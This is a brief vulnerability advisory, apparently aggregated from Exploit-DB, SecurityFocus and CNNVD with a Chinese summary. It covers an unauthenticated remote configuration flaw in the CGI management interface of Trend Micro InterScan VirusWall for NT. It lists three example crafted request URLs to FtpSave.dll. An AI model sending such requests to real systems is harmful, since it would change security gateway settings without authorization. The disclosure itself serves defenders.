https://www.exploit-db.com/exploits/20893
https://www.securityfocus.com/bid/89085
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200110-071

WindowsNT的TrendMicroInterScanVirusWall存在漏洞。远程攻击者通过直接调用某些CGI程序更改配置。该漏洞不限制访问。

source: http://www.securityfocus.com/bid/2808/info

Interscan Viruswall is a Virus scanning software package distributed and maintained by Trend Micro. It is designed to scan for virus occurances in both incoming and outgoing traffic via SMTP, FTP, and HTTP at the gateway of the network.

The management interface used with the Interscan Viruswall uses several programs in a cgi directory that may allow a remote attacker to make configuration changes using maliciously-constructed querystrings submitted to the host. 

Examples:

http://target/interscan/cgi-bin/FtpSave.dll?no
http://target/interscan/cgi-bin/FtpSave.dll?yes
http://target/interscan/cgi-bin/FtpSave.dll?I'm%20here

Trend Micro Interscan Viruswall (HP-UX) 0

来源:BUGTRAQ
名称:20010531[SNSAdvisoryNo.28]InterScanVirusWallforNTremoteconfiguration
链接:http://cert.uni-stuttgart.de/archive/bugtraq/2001/06/msg00006.html